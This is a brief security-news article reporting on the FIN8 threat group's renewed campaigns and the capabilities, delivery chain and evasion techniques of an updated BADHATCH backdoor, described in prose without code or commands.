FIN8 is a financially motivated threat group. After a one-and-a-half-year interruption, it has reactivated and provided a powerful backdoor version. Its upgraded features include screen capture, proxy tunneling, credential theft, and fileless execution.
Researchers discovered the latest attack activities by FIN8, which used a new version of the BADHATCH backdoor to target companies in the insurance, retail, technology, and chemical industries around the world. The affected countries include the United States, Canada, South Africa, Puerto Rico, Panama and Italy.
BadHatch is a custom malware of the FIN8 group. It has an extensible backdoor function. The malware was used in the 2019 attack. The new version of BadHatch has significant improvements in durability, encryption, information collection, and lateral movement. The malware also adds the ability to download files, which can pave the way for various future attacks. BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security surveillance by using TLS encryption to hide Powershell commands.
FIN8 was first disclosed by FireEye in 2016. Its main targets are the retail, hospitality and entertainment industries. It also uses spear phishing and malicious tools such as PUNCHTRACK and BADHATCH to steal payment card data from a point-of-sale ( POS ) system.
C2 Commands in new Badhatch
Since April 2020, at least three different backdoor versions (v2.12 to 2.14) have been discovered, and the latest version of BADHATCH abuses a legitimate service called sslp.io. Download the PowerShell script, and then execute the shellcode containing the BADHATCH DLL.
In addition to being responsible for achieving persistence, PowerShell scripts are also responsible for privilege escalation to ensure that all commands after the script is executed are run as the SYSTEM user.
In addition, the second evasion technique adopted by FIN8 involves communication with a command and control (C2) server masquerading as a legitimate HTTP request.
Distribution of affected countries